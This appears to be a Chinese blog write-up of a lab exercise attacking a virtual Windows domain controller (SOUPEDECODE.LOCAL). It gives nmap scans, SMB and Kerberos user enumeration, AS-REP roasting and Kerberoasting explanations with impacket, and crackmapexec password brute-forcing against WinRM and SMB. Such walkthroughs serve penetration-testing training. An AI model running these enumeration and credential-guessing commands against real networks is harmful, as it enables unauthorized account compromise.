本文最后更新于341 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、信息收集
端口信息收集
sudo nmap -sT --min-rate 10000 -p- 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 00:49 CST
Nmap scan report for 192.168.241.149
Host is up (0.00079s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49722/tcp open unknown
49781/tcp open unknown
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
端口服务系统信息
sudo nmap -sCV -O -p$port 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 00:54 CST
Nmap scan report for 192.168.241.149
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-04 07:54:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49722/tcp open msrpc Microsoft Windows RPC
49781/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|10|2012|Vista (93%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::sp1:home_premium
Aggressive OS guesses: Microsoft Windows Server 2016 (93%), Microsoft Windows 10 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (87%), Microsoft Windows Vista Home Premium SP1 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:dc:3b:4f (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-08-04T07:55:19
|_ start_date: N/A
|_clock-skew: 14h59m57s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.08 seconds
这是一个域控 域名为 SOUPEDECODE.LOCAL
echo "192.168.241.149 SOUPEDECODE.LOCAL " | sudo tee -a /etc/hostssmb信息
smbmap -H 192.168.241.149 -u guest
[+] IP: 192.168.241.149:445 Name: SOUPEDECODE.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
smbmap -H 192.168.241.149 -u guest -r
[+] IP: 192.168.241.149:445 Name: SOUPEDECODE.LOCAL
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 InitShutdown
fr--r--r-- 5 Mon Jan 1 08:05:43 1601 lsass
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 scerpc
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-2a4-0
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-3ec-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 epmapper
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-200-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 LSM_API_service
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-170-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 eventlog
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-404-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 atsvc
fr--r--r-- 4 Mon Jan 1 08:05:43 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-2a4-1
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-540-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 RpcProxy\49678
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 01204ef74c9aa058
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 RpcProxy\593
fr--r--r-- 4 Mon Jan 1 08:05:43 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 netdfs
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-290-0
fr--r--r-- 3 Mon Jan 1 08:05:43 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-998-0
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-9a0-0
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
smbclient -N -L \\192.168.241.149
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.241.149 failed (Error
smbclient -N '\\192.168.241.149\IPC$\'
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
用户枚举
kerberos 协议 用户枚举
sudo nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='SOUPEDECODE.LOCAL',userdb=/usr/share/wordlists/metasploit/unix_users.txt 192.168.241.149
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@SOUPEDECODE.LOCAL
|_ administrator@SOUPEDECODE.LOCAL
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)rpc 协议 用户枚举
rpcclient -U ""%"" 192.168.241.149
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
rpcclient -U "guest" 192.168.241.149
Password for [WORKGROUP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit
ladp 协议 用户枚举
ldapsearch -H ldap://SOUPEDECODE.LOCAL/ -x -s base -b ‘ ‘ “(objectClass=*)” “*” +
# extended LDIF
#
# LDAPv3
# base <‘> with scope baseObject
# filter: (objectclass=*)
# requesting: ‘ “(objectClass=*)” “*” +
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
ldapsearch -H ldap://SOUPEDECODE.LOCAL/ -x -b "" -s sub "(objectClass=*)" cn
# extended LDIF
#
# LDAPv3
# base <> with scope subtree
# filter: (objectClass=*)
# requesting: cn
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
sudo nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='SOUPEDECODE.LOCAL',userdb=/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 192.168.241.149
Starting Nmap 7.92 ( https://nmap.org ) at 2024-08-04 02:30 CST
Nmap scan report for SOUPEDECODE.LOCAL (192.168.241.149)
Host is up (0.00028s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| charlie@SOUPEDECODE.LOCAL
|_ guest@SOUPEDECODE.LOCAL
MAC Address: 08:00:27:DC:3B:4F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 35.79 seconds尝试爆破用户 charlie
impacket-GetNPUsers
功能:
获取不需要预身份验证的用户的 TGT(Ticket Granting Ticket)。
当用户帐户设置了 UF_DONT_REQUIRE_PREAUTH 属性时,可以使用该工具。
使用方法:
impacket-GetNPUsers -dc-ip <DC_IP> <DOMAIN>/<USERNAME> -no-pass
示例:
impacket-GetNPUsers -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pass
-dc-ip:域控制器的 IP 地址。
<DOMAIN>/<USERNAME>:域和用户名。可以使用没有密码的用户帐户。
2. impacket-GetUserSPNs
功能:
枚举设置了服务主名称(SPN)的帐户,并从这些帐户中请求 Kerberos TGS(Ticket Granting Service)。
可以用于获取 Kerberos TGS 票据,这些票据可以被离线破解以获取服务帐户密码。
使用方法:
impacket-GetUserSPNs -dc-ip <DC_IP> <DOMAIN>/<USERNAME> -no-pass
示例:
impacket-GetUserSPNs -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pas
-dc-ip:域控制器的 IP 地址。
<DOMAIN>/<USERNAME>:域和用户名。可以使用没有密码的用户帐户。
注意事项
权限:
确保使用具有足够权限的帐户进行操作。
impacket-GetNPUsers 需要目标用户帐户设置了 UF_DONT_REQUIRE_PREAUTH 属性。
impacket-GetUserSPNs 需要使用具有读取服务帐户信息权限的帐户。
错误排查:
如果 impacket-GetNPUsers 返回 User doesn't have UF_DONT_REQUIRE_PREAUTH set 错误,表明目标用户帐户不符合条件。
如果 impacket-GetUserSPNs 返回 invalidCredentials 错误,确保提供了正确的凭据和域信息。爆破 用户密码
crackmapexec winrm 192.168.241.149 -u 'charlie' -p /usr/share/wordlists/rockyou.txt -d SOUPEDECODE.LOCALsmb 协议 sid 用户枚举
impacket-lookupsid 'soupedecode.local/anonymous@192.168.241.149' > userkerberos rosting 攻击
impacket-GetNPUsers -dc-ip 192.168.241.149 SOUPEDECODE.LOCAL/administrator -no-pass -usersfile=user.txt
没有获取到tgt
使用获得的用户名列表进行爆破
crackmapexec smb 192.168.241.47 -u user.txt -p user.txt –no-bruteforce –continue-on-success -d SOUPEDECODE.LOCAL –no-bruteforce密码和用户一对一匹配
crackmapexec winrm 192.168.241.149 -u user.txt -p user.txt -d SOUPEDECODE.LOCAL
windows 远程管理协议 用户名密码爆破
crackmapexec smb 192.168.241.149 -u user.txt -p user.txt
smb 协议 用户名密码爆破
